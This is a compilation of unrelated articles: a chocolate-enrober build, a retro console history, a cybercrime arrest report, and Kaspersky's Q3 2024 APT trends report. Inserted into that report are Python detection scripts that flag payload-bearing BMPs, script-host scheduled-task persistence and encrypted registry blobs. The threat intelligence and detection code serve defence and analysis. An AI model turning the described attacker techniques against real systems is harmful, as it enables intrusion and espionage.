Chocolate-Coating Machine Mk. 2: the Merry-Go-Round
This holiday season, [Chaz] wanted to continue his family’s tradition of enrobing a little bit of everything in dark chocolate, and built an improved, rotating chocolate-coating machine.
You may remember last year’s offering, aka the conveyor belt version. Although that one worked, too much chocolate was ultimately lost to the surface of the kitchen table. [Chaz] once again started with a standard chocolate fountain and bought a round wire rack that fits the circumference of the bowl at the bottom. He snipped a hole in the center large enough to accommodate the business part of the fountain and printed a collar with holes that he cleverly zip-tied to the rack.
[Chaz] also printed a large gear to go around the bowl, a small gear to attach to a six RPM motor, a motor mount for the bowl, and an air blade attachment for a portable Ryobi fan. The air blade worked quite well, doing the double duty of distributing the chocolate and thinning out the coating. Plus, it gives things a neat rumpled look on the top.
Want to make some special chocolates this year, but don’t want to build an enrober? Get yourself a diffraction grating and make some rainbow goodies with melted chocolate.
The Japanese Console You Maybe Haven’t Heard Of
The games consoles which came out of Japan in the 1980s are the stuff of legend, with the offerings from Nintendo and Sega weaving themselves into global popular culture. Most of us can recite a list of the main players in the market, but how many of us would have Epoch and their Super Cassette Vision on that list? [Nicole Express] is here with a look at this forgotten machine which tried so hard and yet missed the target when competing with the NES or Master System.
Before the arrival of the Sega and Nintendo cartridge-based systems, one of the better known Japanese consoles was the Epoch Cassette Vision. This was something of a hybrid between single-game TV games and an Atari 2600 style computing device for games, in that it used pre-programmed microcontrollers in its cartridges rather than the ROMs of the 2600. For the late-70s gamer this was still hot stuff, but by 1983 as the Master System and NES hove into view it was definitely past its best. Epoch’s response for 1984 was the Super Cassette Vision, a much more conventional 8-bit console with, on the face of it, some respectable graphics and sound hardware.
The article looks at the console’s capabilities in detail, highlighting the multi-colored sprites and smooth sprite movement, but also the tilemap limitations and the somewhat awful sound chip shared with handheld games and sounding very much like it. Coupled with its inferior controllers and TV game style aesthetic, it’s not difficult to see why it would be the last console from this manufacturer.
If forgotten consoles are your thing, have a read about the Fairchild Channel F, the machine that gave us console cartridges.
Operation Serengeti in Africa: 1,000 criminal hackers arrested and $193 million in damage!
African law enforcement agencies have announced Operation Serengeti, during which more than 1,000 people suspected of involvement in cybercrime were arrested. The total financial damage caused is estimated at $193 million.
The operation was coordinated by Interpol and Afripol and was carried out between 2 September and 31 October 2024. Serengeti reportedly “targeted primarily criminals associated with ransomware, BEC (business email compromise) attacks, digital extortion and online fraud”.
134,089 malicious infrastructures dismantled
In total, authorities in 19 African countries arrested 1,006 suspects and dismantled 134,089 malicious infrastructures and networks, based on operational intelligence provided to them by partners from cybersecurity companies such as Cybercrime Atlas, Fortinet, Group-IB, Kaspersky Lab, Team Cymru, Trend Micro and Uppsala Security.
Investigators found that the suspects and their infrastructure were linked to at least 35,224 identified victims who lost around $193 million to various hacking attacks and fraud. During Operation Serengeti, victims were able to recover around $44 million.
A vast operation covering the whole of Africa
Law enforcement agencies in specific regions report that the following actions are the result of Serengeti.
- Kenya: a credit card fraud case involving losses of $8.6 million was solved. The funds were stolen using fraudulent scripts and redirected through the SWIFT system to companies in the United Arab Emirates, Nigeria and China. Around two dozen arrests were made.
- Senegal: a Ponzi scheme was uncovered involving 1,811 victims who lost around six million dollars. More than 900 SIM cards, $11,000 in cash, phones, laptops and victims’ identity cards were seized. Eight people were arrested (including five Chinese nationals).
- Nigeria: a man was arrested for running an online investment scam and earning $300,000 through false cryptocurrency promises.
- Cameroon: a network marketing scam involving victims from seven countries was exposed. The victims had been promised a job, but ended up being held captive and forced to recruit other people in order to be released. The group collected at least $150,000 in membership fees.
- Angola: the activities of an international group running a virtual casino in Luanda were disrupted. Hundreds of people were deceived with promises of winnings in exchange for attracting new members. 150 arrests were made, and 200 computers and more than 100 mobile phones were seized.
Algeria, Benin, Côte d’Ivoire, the DRC, Gabon, Ghana, Mauritius, Mozambique, Rwanda, South Africa, Tanzania, Tunisia, Zambia and Zimbabwe also took part in Operation Serengeti.
The article “Operation Serengeti in Africa: 1,000 criminal hackers arrested and $193 million in damage!” comes from il blog della sicurezza informatica.
APT trends report Q3 2024
Kaspersky’s Global Research and Analysis Team (GReAT) has been releasing quarterly summaries of advanced persistent threat (APT) activity for over seven years now. Based on our threat intelligence research, these summaries offer a representative overview of what we’ve published and discussed in more detail in our private APT reports. They are intended to highlight the significant events and findings that we think are important for people to know about. This is our latest roundup, covering activity we observed during Q3 2024.
If you’d like to learn more about our intelligence reports or request more information about a specific report, please contact intelreports@kaspersky.com.
The most remarkable findings
In the second half of 2022, a wave of attacks from an unknown threat actor targeted victims with a new type of attack framework that we dubbed P8. The campaign targeted Vietnamese victims, mostly from the financial sector, with some from the real estate sector. Later, in 2023, Elastic Lab published a report about an OceanLotus APT (aka APT32) attack that leveraged a new set of malicious tools called Spectral Viper. Although the campaigns are the same, we cannot conclusively attribute P8 to OceanLotus.
The P8 framework includes a loader and multiple plugins. Except for the first-stage loader and the PipeShell plugin, all plugins are downloaded from the C2 and then loaded into memory, leaving no trace on disk. After a thorough analysis of the framework and its modules, we believe P8 was developed based on the open source project C2Implant, which is a red teaming C2 framework. However, P8 contains many built-in functions and redesigns of the communication protocol and encryption algorithm, making it a well-designed and powerful espionage platform. Based on the implemented supported commands, we suspect the goal is to implement another Cobalt Strike-like post-exploitation platform. Methods to gain persistence on affected systems are not built in and depend on commands received from the C2.
Unfortunately, we were unable to obtain any bait files or initial infection vectors. Based on limited telemetry, we believe with medium to low confidence that some of the initial infections were spear-phishing emails. Notably, these attacks use an obsolete version of the Kaspersky Removal Tool to side-load the P8 beacon. We also observed SMB and printer driver vulnerabilities being used to move laterally through the network.
We published a follow-up report on P8 that describes the plugins used in the attacks. Each time the system restarts, or as required by the operation, P8 downloads additional plugins from the C2 or loads them from disk into memory. So far, we have collected 12 plugins or modules that are used to support the operation by adding functionality for lateral movement, exfiltration, file management, credential stealing, taking screenshots or custom loading capabilities. In particular, two plugins are used to upload files of interest; one plugin is used for small files, while a second is used to upload large files to another server, presumably to reduce the network load on the C2.
We subsequently detected new attacks from this threat actor. While carrying out these attacks, the actor changed its TTPs from those outlined in our previous reports. For example, new persistence mechanisms were detected and we found that the loading mechanism of the final payload, the P8 beacon, also changed. In terms of victimology, there was little change. Most of the infections were still at financial institutions in Vietnam, with one victim active in the manufacturing industry. The infection vector has still not been found, nor have we been able to link these attacks to OceanLotus (APT32).
Earlier in 2024, a secure USB drive was found to be compromised and malicious code was injected into the access management software installed on the USB drive. The secure USB drive was developed by a government entity in Southeast Asia to securely store and transfer files between machines in sensitive environments. The access management software facilitates access to the encrypted partition of the drive. A Trojanized version of the software module was found to be used in these attacks. The malicious code injected into it is designed to steal sensitive files saved on the secure partition of the drive, while also acting as a USB worm and spreading the infection to USB drives of the same type.
Last year we investigated attacks against a different type of secure USB drive. Similarly, the attacks were delivered via a Trojanized USB management software called UTetris. We are tracking the threat actor behind the UTetris software attack as TetrisPhantom. In addition to the Trojanized UTetris software, TetrisPhantom uses a number of other malicious tools that have been in use for a few years. TetrisPhantom is still active and new samples of its tools have recently been detected.
While both the tactic of targeting a secure USB drive by compromising the software module installed on the drive and the victim profile in the recent attacks are similar to TetrisPhantom attacks, the malicious code implanted in the drive bears little similarity to the code injected into the utetris.exe program.
Our report provided an initial analysis of the Trojanized USB management program.
Chinese-speaking activity
In July 2021, we detected a campaign called ExCone targeting government entities in Russia. The attackers leveraged the VLC media player to deploy the FourteenHi backdoor after exploiting MS Exchange vulnerabilities. We also found Cobalt Strike beacons and several traces tying this actor to the ShadowPad malware and UNC2643 activity, which is in turn associated with the HAFNIUM threat actor.
Later that year, we discovered a new set of activities. This time the victimology changed: victims were also found in Europe, Central Asia and Southeast Asia. We also found new samples that we linked to Microcin, a Trojan used exclusively by SixLittleMonkeys. Shortly after, another campaign called DexCone was discovered, with similar TTPs to the ExCone campaign. Several new backdoors such as Pangolin and Iguania were discovered, both of which have similarities to FourteenHi.
Then, in 2022, we discovered another campaign by the same threat actor targeting Russia, with a special interest in government institutions, using spear-phishing emails as an infection vector and deploying an updated version of the Pangolin Trojan.
After that, we did not observe any new activity related to this actor until mid-July 2024. In this most recent campaign, the actor uses spear-phishing emails, embedding a JavaScript loader as the initial infection vector. The JavaScript loader loads yet another loader from a ZIP file, which in turn downloads a BMP image containing shellcode and an embedded PE file, which is the final payload. This is a new backdoor with limited functionality, reading and writing to files and injecting code into the msiexec.exe process. In this campaign, the actor decided to attack Russian educational institutions instead of government entities as it had previously.
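The BMP staging step above (a loader fetches a BMP image that carries shellcode and an embedded PE file) is a good fit for a structural file check. The following is an added example, not code from the Kaspersky report or from any tooling it describes: it compares the pixel area a BMP's headers describe with the bytes actually present, scans for a PE signature, and measures the entropy of anything trailing the image. The three sample bitmaps, the fake PE stub and the opaque blob are constructed here; the BMP and PE header offsets are the real ones.

```python
"""
Added example, not code from the Kaspersky report: a triage check for BMP
files that carry more than an image. The three sample files are constructed
in this file; the BMP and PE header offsets are the real ones.
"""
import math
import struct

FILE_HEADER_LEN = 14   # BITMAPFILEHEADER
INFO_HEADER_LEN = 40   # BITMAPINFOHEADER


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 8.0 is uniformly random, real pixel data is usually lower."""
    if not data:
        return 0.0
    n = len(data)
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def find_embedded_pe(blob: bytes):
    """Offset of the first 'MZ' whose e_lfanew points at a 'PE\\0\\0' signature, else None."""
    pos = blob.find(b"MZ")
    while pos != -1:
        if pos + 0x40 <= len(blob):
            e_lfanew = struct.unpack_from("<I", blob, pos + 0x3C)[0]
            sig = pos + e_lfanew
            if blob[sig:sig + 4] == b"PE\x00\x00":
                return pos
        pos = blob.find(b"MZ", pos + 1)
    return None


def analyse_bmp(blob: bytes) -> dict:
    """Compare the pixel area the headers describe with the bytes actually present."""
    result = {"valid_bmp": False, "trailing_bytes": 0, "trailing_entropy": 0.0,
              "pe_offset": None, "suspicious": False}
    if len(blob) < FILE_HEADER_LEN + INFO_HEADER_LEN or blob[:2] != b"BM":
        return result
    pixel_offset = struct.unpack_from("<I", blob, 10)[0]           # bfOffBits
    width, height, _planes, bpp = struct.unpack_from("<iiHH", blob, 18)
    if width <= 0 or height == 0 or bpp == 0:
        return result
    result["valid_bmp"] = True
    stride = ((width * bpp + 31) // 32) * 4                        # rows are 4-byte aligned
    expected_end = pixel_offset + stride * abs(height)             # negative height = top-down
    trailing = blob[expected_end:]
    result["trailing_bytes"] = len(trailing)
    result["trailing_entropy"] = round(shannon_entropy(trailing), 2)
    result["pe_offset"] = find_embedded_pe(blob)
    # Either a PE header anywhere in the file, or a large random-looking tail, is enough to flag
    result["suspicious"] = result["pe_offset"] is not None or (
        len(trailing) >= 256 and result["trailing_entropy"] > 7.0)
    return result


def make_bmp(width: int, height: int, pixels: bytes, extra: bytes = b"") -> bytes:
    """Build a 24-bit BMP around `pixels` and append `extra` after the pixel data."""
    offset = FILE_HEADER_LEN + INFO_HEADER_LEN
    file_header = b"BM" + struct.pack("<I4xI", offset + len(pixels), offset)
    info_header = struct.pack("<IiiHHIIiiII", INFO_HEADER_LEN, width, height, 1, 24,
                              0, len(pixels), 2835, 2835, 0, 0)
    return file_header + info_header + pixels + extra


# 2x2 pixels at 24 bpp: stride 8, so 16 pixel bytes (constructed)
PIXELS = bytes(16)
# Minimal fake PE header: 'MZ', e_lfanew at 0x3C pointing to 'PE\0\0' at 0x40 (constructed)
FAKE_PE = b"MZ" + bytes(58) + struct.pack("<I", 0x40) + b"PE\x00\x00" + bytes(20)
# 2048 bytes covering every byte value evenly: entropy 8.0, like an encrypted payload (constructed)
OPAQUE_BLOB = bytes(range(256)) * 8

CLEAN_BMP = make_bmp(2, 2, PIXELS)
BMP_WITH_PE = make_bmp(2, 2, PIXELS, FAKE_PE)
BMP_WITH_BLOB = make_bmp(2, 2, PIXELS, OPAQUE_BLOB)

if __name__ == "__main__":
    for name, blob in (("clean", CLEAN_BMP), ("pe", BMP_WITH_PE), ("blob", BMP_WITH_BLOB)):
        print(name, analyse_bmp(blob))
```

A clean image ends where its headers say it should; appended data that decodes to a PE, or that is large and near-uniformly random, is what the loader described above would carry. The check is a triage heuristic rather than a verdict: a loader can also hide a payload inside the pixel data itself, which the trailing-bytes entropy test does not cover.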
The Scieron backdoor, a tool commonly used in cyber-espionage campaigns by the Scarab group, was detected in a new campaign. This campaign introduces novel decoders and loaders that use machine-specific information to decode and decrypt the Scieron backdoor and run it in memory. The campaign has specifically targeted a government entity in an African country and a telecoms provider in Central Asia. Notably, the infections within the telecoms provider have been traced back to 2022.
More recently, in June 2024, an updated infection chain was identified, with an updated set of decoders and loaders designed to run the Scieron backdoor and make it persistent. Our private report also provides a detailed description of the attackers’ post-compromise activities.
Europe
Awaken Likho is an APT campaign, active since at least July 2021, primarily targeting government organizations and contractors. To date, we have detected more than 120 targets in Russia, but there are also targets in other countries and territories such as India, China, Vietnam, Taiwan, Turkey, Slovakia, the Philippines, Australia, Switzerland and the Czech Republic, among others. Based on our findings, we would like to highlight two specific features of this campaign: all attacks are well prepared, and the hackers rely on the use of the legitimate remote administration tool UltraVNC. While this approach is rather simplistic, the attackers have been using this technique successfully for years.
We discovered a new Awaken Likho campaign that emerged in May 2024, in which the threat actor adjusted its TTPs slightly. The threat actor cleaned up its Golang SFX-based archives by removing unused files and also switched to executing AutoIT scripts after file extraction. UltraVNC remained the final payload, but in this campaign it was made to look like a OneDrive update utility. The targeting remained the same as in the earlier campaign – mainly government organizations and their contractors located in Russia.
Awaken Likho then adjusted its TTPs again, in a campaign uncovered in June 2024 that is still ongoing. The threat actor continued to favor the use of AutoIT scripts and also began using protectors such as Themida to protect its samples. While most of the samples we found still deployed the UltraVNC module, the attackers changed the final payload from UltraVNC to MeshAgent in several samples. Unlike previous campaigns, we did not observe the Golang SFX droppers this time. The nature of the threat actor, leveraging open source and free tools, allows it to quickly change its arsenal during active campaigns.
Epeius is a commercial spyware tool developed by an Italian company that claims to provide intelligence solutions to law enforcement agencies and governments. In recent years, the malware attracted the attention of the community due to the publication of two articles. The first, published in 2021 by Motherboard and Citizen Lab, shared the first evidence and indicators related to the software. The second, an article published in 2024 by the Google Threat Analysis Group, described the business model of various companies that provide commercial surveillance solutions. Knowledge of this threat is sparse and the Epeius malware has never been publicly described in detail. Our own threat hunting efforts to obtain related samples started in 2021, and last year we discovered a DEX file that we attribute with medium to high confidence to Epeius. Our private report describes what we know about Epeius and provides a technical description of its main Android component.
Middle East
In September 2023, our colleagues at ESET published a report on a newly discovered and sophisticated backdoor used by the FruityArmor threat actor, which they named DeadGlyph. The same month, we released an APT report detailing the ShadowWhisperer and NightmareLoader tools used in conjunction with the DeadGlyph malware. More recently, we identified what appears to be the latest version of the native DeadGlyph Executor backdoor module, with changes to both its architecture and workflow components.
MuddyWater is an APT actor that surfaced in 2017 and has traditionally targeted countries in the Middle East, Europe and the USA. The actor typically uses multi-stage PowerShell execution in its attacks, probably to obfuscate the attacks, evade defenses and hinder analysis.
Recently we uncovered VBS/DLL-based implants used in intrusions by the MuddyWater APT group that are still active today. The implants were found at multiple government and telecoms entities in Egypt, Kazakhstan, Kuwait, Morocco, Oman, Syria and the UAE. The threat actor achieves persistence through scheduled tasks that execute a malicious VBS file with the wscript.exe utility.
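One way to hunt for the persistence described above (scheduled tasks that run a VBS file through wscript.exe) is to audit exported task definitions. The following is an added example, not code from the report: it parses the Task Scheduler XML that `schtasks /query /xml` produces, flags Exec actions that launch a script host, extracts script paths from the arguments and notes whether they sit in user-writable directories or whether the task is hidden. The two task definitions are constructed; the element names and namespace are those of the Task Scheduler schema.

```python
"""
Added example, not from the Kaspersky report: auditing exported scheduled task
definitions for a script-host persistence pattern. The two task XML documents
below are constructed (XML declaration omitted); the element names and the
namespace are those of the Task Scheduler schema.
"""
import re
import xml.etree.ElementTree as ET

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
# A drive letter or %VAR% followed by a path ending in a script extension
SCRIPT_PATH = re.compile(r'(?:%[A-Za-z]+%|[A-Za-z]:)\\[^\s"]+?\.(?:vbs|vbe|js|jse|wsf)\b', re.I)
USER_WRITABLE_PREFIXES = ("c:\\users\\", "c:\\programdata\\", "%appdata%", "%localappdata%",
                          "%temp%", "%tmp%", "%public%")


def _basename(command: str) -> str:
    """Executable name only, ignoring quotes, directory and case."""
    return command.strip().strip('"').replace("\\", "/").rsplit("/", 1)[-1].lower()


def audit_task_xml(xml_text: str) -> dict:
    """Flag a task whose Exec action launches a script host on a script file."""
    root = ET.fromstring(xml_text)
    ns = root.tag[1:].split("}")[0] if root.tag.startswith("{") else ""
    q = (lambda name: f"{{{ns}}}{name}") if ns else (lambda name: name)

    report = {"script_host": None, "script_paths": [], "user_writable": [],
              "hidden": False, "flagged": False}
    hidden = root.find(f"{q('Settings')}/{q('Hidden')}")
    report["hidden"] = hidden is not None and (hidden.text or "").strip().lower() == "true"

    for action in root.iter(q("Exec")):
        command = action.findtext(q("Command"), default="")
        arguments = action.findtext(q("Arguments"), default="")
        exe = _basename(command)
        if exe in SCRIPT_HOSTS:
            report["script_host"] = exe
            paths = SCRIPT_PATH.findall(arguments)
            report["script_paths"].extend(paths)
            report["user_writable"].extend(
                p for p in paths if p.lower().startswith(USER_WRITABLE_PREFIXES))
    report["flagged"] = report["script_host"] is not None
    return report


# Constructed: a hidden logon task running a VBS file from a world-writable folder
SUSPICIOUS_TASK = r"""<Task version="1.4" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo>
    <Author>EXAMPLE\user</Author>
  </RegistrationInfo>
  <Triggers>
    <LogonTrigger>
      <Enabled>true</Enabled>
    </LogonTrigger>
  </Triggers>
  <Settings>
    <Hidden>true</Hidden>
  </Settings>
  <Actions Context="Author">
    <Exec>
      <Command>C:\Windows\System32\wscript.exe</Command>
      <Arguments>//e:vbscript //b C:\Users\Public\update.vbs</Arguments>
    </Exec>
  </Actions>
</Task>"""

# Constructed: an ordinary maintenance task
BENIGN_TASK = r"""<Task version="1.4" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Settings>
    <Hidden>false</Hidden>
  </Settings>
  <Actions Context="Author">
    <Exec>
      <Command>%SystemRoot%\System32\cleanmgr.exe</Command>
      <Arguments>/autoclean</Arguments>
    </Exec>
  </Actions>
</Task>"""

if __name__ == "__main__":
    print(audit_task_xml(SUSPICIOUS_TASK))
    print(audit_task_xml(BENIGN_TASK))
```

On a live host the same function can be run over every file under `C:\Windows\System32\Tasks`, which stores each task in this XML form; a script host launched from a user-writable path by a hidden task is the combination worth looking at first.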
The TTPs and infrastructure we analyzed for the current intrusions are similar to previously reported intrusions by the MuddyWater APT group.
Southeast Asia and Korean Peninsula
Gh0st RAT, an open source RAT created about 15 years ago, is used by various groups, including state-sponsored actors. One of them is Dragon Breath (aka APT-Q-27 and Golden Eye Dog), first discussed in 2020 in connection with a watering hole campaign aimed at tricking users into installing a Trojanized version of Telegram. By 2022, the group was still using Trojanized Telegram applications as an infection vector, but had changed the final payload to Gh0st RAT.
A year later, Sophos published a blog post describing the latest change in the group’s TTPs, which included double side-loading DLLs. Since then, the Gh0st RAT payload has remained the same, but the attackers have again slightly adjusted their TTPs. DLL side-loading was abandoned and replaced by leveraging a logical flaw in a version of the TrueUpdate application, while more recently the group began to run the malware via a Python-based infection chain executed by the installer package.
Historically, Dragon Breath has targeted the online gaming and gambling industry. Given the nature of the infection vector, we’re not yet able to determine the target audience for this campaign. The attack begins by tricking users into downloading a malicious MSI installer. Once the installer is started, the malware is installed alongside the legitimate application. We believe the victim is prompted to download and launch it from a fake site while searching for a Chinese version of the legitimate TrueUpdate MSI installer.
Bitter APT has been active for over a decade. Since late 2023, this threat actor has used and continues to use CHM (compiled HTML) files, LNK shortcuts and DOC files as the first stage of infection. These files carry malicious scripts to connect to a remote server and download the next stage of the attacks, and appear to be used as attachments to spear-phishing emails. The payloads delivered via these malicious scripts represent new samples of backdoor modules described in previous private reports. However, in several cases, the final payloads can only be downloaded by pre-selected system configurations authorized by the threat actor after the initial reconnaissance phase. In a recent report, we discussed the workflow of the initial LNK, DOC and CHM files, their progress through the next stages of the attack, as well as the updates to the final backdoor modules and corresponding infrastructure.
Tropic Trooper (aka KeyBoy and Pirate Panda) is an APT group operating since 2011. The group’s targets have traditionally been in government, as well as the healthcare, transportation and high-tech industries located in Taiwan, the Philippines, and Hong Kong. Our most recent investigation revealed that the group conducted persistent campaigns against a government entity in Egypt, beginning in June 2023 and continuing into 2024.
We noticed the infection in June 2024, when our telemetry showed recurring alerts for a new China Chopper web shell variant (China Chopper is used by many Chinese-speaking actors) found on a public web server. The server hosted a Content Management System (CMS) called Umbraco, an open source CMS platform for publishing content written in C#. The observed web shell component was compiled as a .NET module of Umbraco CMS.
During our subsequent investigation, we looked for other suspicious detections on this public server and identified several related malware sets. These include post-exploitation tools that we believe with medium confidence are related and being used as part of this intrusion.
We also identified new DLL search-order hijacking implants that are loaded from a legitimate vulnerable executable because it lacks the full path to the required DLL. This attack chain attempted to load the Crowdoor loader, named after SparrowDoor described by ESET. During the attack, the security agent blocked the first Crowdoor loader, which prompted the attackers to switch to a new, as yet unreported variant, with almost the same effect.
We investigated the attribution of this activity to the Chinese-language threat actor known as Tropic Trooper. Our findings show an overlap in capabilities reported in recent Tropic Trooper campaigns. The samples we found also show a high degree of overlap with samples previously attributed to Tropic Trooper.
PhantomNet is a RAT first described by ESET in late 2020. In 2021, we released our analysis of the PhantomNet malware, which at the time was being used in attacks against the Vietnamese government sector. Our report discussed in detail the plugins we found and the commands it supported.
We rediscovered PhantomNet during a recent investigation into a cyberattack on the Brazilian education and government sectors that occurred in April. This time we were able to recover several scripts, commands executed by the attackers, and the PhantomNet builder tool. The threat actor has changed the persistence mechanism so that the payload is now stored in an encrypted manner in the Windows registry and with an associated loader to retrieve the payload from the registry. There are also some changes to the victimology. Previously, PhantomNet infections were found in Asia, but now the infections have been found in many regions around the world and affect a wide variety of industries.
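The persistence layout described above (an encrypted payload held in a registry value, retrieved by a separate loader) leaves a fairly distinctive artifact: a large REG_BINARY value whose bytes look random. The following is an added example, not code from the report: it parses a .reg export in the format regedit and `reg export` write, rejoining backslash-continued lines, and flags binary values above a size and entropy threshold. The export text, the key path (ExampleVendor is a placeholder) and both blobs are constructed.

```python
"""
Added example, not from the Kaspersky report: hunting for an opaque payload
parked in the registry by parsing a .reg export. The export, the key path
and the two binary values are constructed for this example.
"""
import math

MIN_BLOB_BYTES = 512   # smaller binaries are common application state
MIN_ENTROPY = 7.0      # bits per byte; encrypted or compressed data sits near 8.0


def shannon_entropy(data: bytes) -> float:
    if not data:
        return 0.0
    n = len(data)
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def logical_lines(text: str) -> list:
    """Join regedit's backslash-continued value lines back into single lines."""
    joined, current = [], ""
    for raw in text.splitlines():
        line = raw.strip()
        if line.endswith("\\"):
            current += line[:-1]
        else:
            joined.append(current + line)
            current = ""
    if current:
        joined.append(current)
    return joined


def parse_binary_values(reg_text: str):
    """Yield (key_path, value_name, data) for every plain REG_BINARY ('hex:') value."""
    key = None
    for line in logical_lines(reg_text):
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1]
        elif "=hex:" in line:                      # hex(7): etc. are other types, skipped
            name, hex_part = line.split("=hex:", 1)
            name = "(Default)" if name == "@" else name.strip('"')
            yield key, name, bytes.fromhex(hex_part.replace(",", ""))


def find_opaque_blobs(reg_text: str) -> list:
    """Report registry binaries big and random-looking enough to be a stored payload."""
    hits = []
    for key, name, data in parse_binary_values(reg_text):
        ent = shannon_entropy(data)
        if len(data) >= MIN_BLOB_BYTES and ent >= MIN_ENTROPY:
            hits.append({"key": key, "value": name, "size": len(data), "entropy": round(ent, 2)})
    return hits


def as_hex_value(name: str, data: bytes) -> str:
    """Render a REG_BINARY value the way regedit does: 25 bytes per line, '\\' continuation."""
    chunks = [",".join(f"{b:02x}" for b in data[i:i + 25]) for i in range(0, len(data), 25)]
    return f'"{name}"=hex:' + ",\\\n  ".join(chunks)


# Constructed payload: every byte value appears equally often, so entropy is exactly 8.0
PAYLOAD = bytes((i * 73 + 41) % 256 for i in range(1024))
# Constructed small, low-entropy binary of the kind many applications store
LAYOUT = b"\x01\x00\x00\x00" * 4

SAMPLE_REG = "\n".join([
    "Windows Registry Editor Version 5.00",
    "",
    r"[HKEY_CURRENT_USER\Software\ExampleVendor\Settings]",   # placeholder key path
    '"Installed"=dword:00000001',
    as_hex_value("Layout", LAYOUT),
    as_hex_value("Config0", PAYLOAD),
    "",
])

if __name__ == "__main__":
    for hit in find_opaque_blobs(SAMPLE_REG):
        print(hit)
```

The thresholds are deliberately loose; the point of the size and entropy pair is that legitimate settings are usually small, structured, or both. Each hit still needs a look at what reads the value, since a stored payload is only useful to the attacker together with the loader that decrypts it.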
We discussed these findings in our private report, filling in the gaps from our previous report.
We have observed that the Kimsuky group uses a strategy of registering malware as a service for reliable persistence. The so-called ServiceChanger malware drops a malicious DLL file and registers a service disguised as a legitimate service. In the case we analyzed, ServiceChanger installed the TOGREASE malware, which is an evolved version of GREASE that adds the ability to toggle RDP activation when necessary by the operator; and in another instance, it was observed installing the XMRig miner.
In addition, this year’s updated version of the GREASE malware creates backdoor accounts for RDP connections under the names “Guest” and “IIS_USER”. It borrows code from the publicly available UACME to bypass UAC and execute commands with escalated privileges. Uniquely, the resources section of the GREASE malware includes a Zoom Opener installer vulnerable to DLL hijacking, which has not been observed in use by Kimsuky. However, it is possible that they may create malware that exploits this vulnerability in the future.
The updated GREASE malware is thought to be connected to the RandomQuery malware also used by Kimsuky, as it communicates with the C2 in a similar manner. The similarity and the overlap between the TOGREASE and GREASE malware used by the Kimsuky group suggests that this group is behind the malware.
Hacktivism
In the course of our research on hacktivist groups targeting organizations based in Russia, we have identified similarities among several of these groups. This suggests either that these clusters of activity share at least a subset of the same individuals, or that the groups are working closely together in their attacks. Our report details the tools, malware, and procedures of the BlackJack group and links it to the previously known group Twelve. In addition, further examination of its preferred wiper and ransomware tools uncovered samples that cannot be definitively attributed to either group.
Other interesting discoveries
In June, we identified an active campaign called “PassiveNeuron”, targeting government entities in Latin America and East Asia using previously unknown malware. The servers were compromised before security products were installed, and the method of infection is still unknown. The implants used in this operation were dubbed “Neursite” and “NeuralExecutor”. They do not share any code similarities with known malware, so attribution to a known threat actor is not possible at this time. The campaign shows a high level of sophistication, with the threat actor using compromised internal servers as an intermediate C2 infrastructure. The threat actor is able to move laterally through the infrastructure and exfiltrate data, optionally creating virtual networks that allow attackers to steal files of interest even from machines isolated from the internet. A plugin-based approach provides dynamic adaptation to the attacker’s needs.
In mid-April, we discovered a suspicious domain which, upon further investigation, revealed two backdoors written in Golang. During analysis, another backdoor was discovered that was used earlier in the attack timeline and protected using VMProtect. As well as the backdoors, an unknown keylogger and the use of the SOCAT tool were observed in this attack. The campaign exhibits a few peculiarities. First, the Golang backdoor uses Google Translate services as a proxy to communicate with the C2. Second, the threat actor tries to imitate Kaspersky software in terms of file names and names of scheduled tasks. Third, we found only one infection, targeting a telecoms research center in India. We were unable to attribute this campaign to any known threat actor based on code similarity or TTPs.
In early April, we decided to take a closer look at the Windows Desktop Window Manager (DWM) Core Library Elevation of Privilege vulnerability (CVE-2023-36033), which was previously discovered as a zero-day and exploited in the wild. While searching for samples related to this exploit and attacks using it, we found a document of note that was uploaded to a multi-scanner service on April 1, 2024. This document had a rather descriptive file name, indicating that it contained information about a vulnerability in the Windows operating system. Inside the document we found a brief description of a Windows Desktop Window Manager vulnerability and how it could be exploited to gain system privileges.
The exploitation process described in the document was identical to that used in the previously mentioned zero-day exploit for CVE-2023-36033. However, the vulnerability was different. Judging by the quality of the writing and the fact that the document was missing critical details about how to actually trigger the vulnerability, there was a high probability that the vulnerability described was made up or was present in code that could not be accessed or controlled by the attackers. The subsequent investigation revealed a zero-day vulnerability that can be used to escalate privileges. After reporting the findings to Microsoft, the vulnerability was designated CVE-2024-30051 and a patch was released as part of Patch Tuesday on May 14, 2024.
After closely monitoring our statistics for related exploits and attacks, it became clear that there were several exploits for this zero-day vulnerability. Our discoveries showed that it was being used in conjunction with QakBot and other malware such as NewBot, leading us to believe that multiple threat actors have access to it. While previous findings of in-the-wild exploitation of CVE-2024-30051 showed financial motivation, it is possible that it could be leveraged in future APT activity.
An updated set of intrusions, possibly related to the Deathstalker cyber-mercenary group, employs an updated DarkMe VB6 OCX/DLL implant and stealthier TTPs, such as a more sophisticated infection chain.
In the intrusions we reported previously, the threat actor typically delivered the initial dropper through instant messaging (IM) apps such as Skype. In more recent intrusions, the actor typically delivered the initial dropper through Telegram. We assess with medium confidence that the threat actor delivered the initial droppers via Telegram channels related to e-trading and fintech news.
Apart from the delivery method, the attackers also increased their level of OPSEC and post-compromise cleanup by deleting post-exploitation files, tools, and registry keys after the operators achieve their objectives. Such actions, in turn, make the infection harder to detect and complicate post-compromise investigation.
Final thoughts
While some threat actors’ TTPs remain consistent over time, such as a heavy reliance on social engineering as a means of gaining entry into a target organization or compromising an individual’s device, others have updated their toolsets and expanded the scope of their activities. Our regular quarterly reviews are designed to highlight the most significant developments related to APT groups.
Here are the key trends we observed in Q3 2024:
- This quarter, we saw threat actors broaden their targeting, both in terms of verticals and geography.
- The purpose of most APT activity is cyber-espionage, although hacktivist attacks remain a feature of the threat landscape this quarter, mirroring areas of real-world conflict.
- Even more open source tools have been employed by APT threat actors, mostly to manage network connectivity with C2s.
- We continue to see threat actors using LOTL (Living off the Land) techniques in their campaigns.
As always, we would like to point out that our reports are the product of our visibility into the threat landscape. However, it is important to remember that while we strive for continuous improvement, there is always the possibility that other sophisticated attacks may fly under our radar.
